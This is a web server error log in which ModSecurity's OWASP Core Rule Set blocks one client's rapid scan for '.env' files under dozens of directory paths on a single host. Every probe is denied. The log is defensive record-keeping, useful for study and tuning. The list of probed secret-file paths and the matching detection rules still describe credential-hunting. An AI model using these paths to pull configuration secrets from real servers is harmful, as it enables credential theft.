[Sun Jul 27 09:04:50.077362 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIQAAABY"]
[Sun Jul 27 09:04:50.122737 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIgAAABY"]
[Sun Jul 27 09:04:50.122982 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIgAAABY"]
[Sun Jul 27 09:04:50.123137 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIgAAABY"]
[Sun Jul 27 09:04:50.149127 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIwAAABY"]
[Sun Jul 27 09:04:50.149337 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIwAAABY"]
[Sun Jul 27 09:04:50.149495 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIwAAABY"]
[Sun Jul 27 09:04:50.302778 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjJgAAABY"]
[Sun Jul 27 09:04:50.303011 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjJgAAABY"]
[Sun Jul 27 09:04:50.303169 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjJgAAABY"]
[Sun Jul 27 09:04:50.336888 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjJwAAABY"]
[Sun Jul 27 09:04:50.337115 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjJwAAABY"]
[Sun Jul 27 09:04:50.337277 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjJwAAABY"]
[Sun Jul 27 09:04:50.390637 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKAAAABY"]
[Sun Jul 27 09:04:50.390910 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKAAAABY"]
[Sun Jul 27 09:04:50.391107 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKAAAABY"]
[Sun Jul 27 09:04:50.416216 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKQAAABY"]
[Sun Jul 27 09:04:50.416429 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKQAAABY"]
[Sun Jul 27 09:04:50.416579 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKQAAABY"]
[Sun Jul 27 09:04:50.438970 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKgAAABY"]
[Sun Jul 27 09:04:50.439170 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKgAAABY"]
[Sun Jul 27 09:04:50.439321 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKgAAABY"]
[Sun Jul 27 09:04:50.461333 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKwAAABY"]
[Sun Jul 27 09:04:50.461542 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKwAAABY"]
[Sun Jul 27 09:04:50.461700 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjKwAAABY"]
[Sun Jul 27 09:04:50.483662 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLAAAABY"]
[Sun Jul 27 09:04:50.483858 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLAAAABY"]
[Sun Jul 27 09:04:50.484035 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLAAAABY"]
[Sun Jul 27 09:04:50.506086 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLQAAABY"]
[Sun Jul 27 09:04:50.506281 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLQAAABY"]
[Sun Jul 27 09:04:50.506453 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLQAAABY"]
[Sun Jul 27 09:04:50.528580 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLgAAABY"]
[Sun Jul 27 09:04:50.528779 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLgAAABY"]
[Sun Jul 27 09:04:50.528935 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLgAAABY"]
[Sun Jul 27 09:04:50.551028 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLwAAABY"]
[Sun Jul 27 09:04:50.551227 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLwAAABY"]
[Sun Jul 27 09:04:50.551381 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjLwAAABY"]
[Sun Jul 27 09:04:50.573895 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjMAAAABY"]
[Sun Jul 27 09:04:50.574095 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjMAAAABY"]
[Sun Jul 27 09:04:50.574240 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjMAAAABY"]
[Sun Jul 27 09:04:50.595862 2025] [authz_core:error] [pid 1495876] [client 185.177.72.115:16562] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
